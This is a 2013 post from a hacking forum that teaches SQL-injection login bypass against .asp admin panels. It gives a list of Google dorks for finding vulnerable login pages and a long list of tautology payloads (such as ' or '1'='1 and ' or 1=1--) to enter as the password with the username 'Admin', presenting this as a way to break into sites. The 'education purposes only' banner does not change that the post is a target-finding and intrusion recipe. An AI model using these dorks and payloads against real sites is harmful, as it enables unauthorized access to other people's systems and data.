HT Planet is strictly for education purposes only. Any misuse of the information provided will result in your account being banned!


Post Reply 
 
Thread Rating:
  • 19 Votes - 2.95 Average
  • 1
  • 2
  • 3
  • 4
  • 5
List of some sql injection and google dork
08-18-2013,
Post: #1
List of some sql injection and google dork
what is sql injection?
================
A injecting sql queries into another database or using queries to get auth bypass as an admin.
=======================================================
part 1 : Basic sql injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'
So your input should look like this

username:Admin
password:'or'1'='1

So click submit and you'r in
NOTE not all sites are vulnerable

[Image: 362f1810.gif]
Find all posts by this user
Like Post Quote this message in a reply
Post Reply 


Forum Jump:


User(s) browsing this thread: 1 Guest(s)
Contact Us | Hack The Planet | Return to Top | Return to Content | Lite (Archive) Mode | RSS Syndication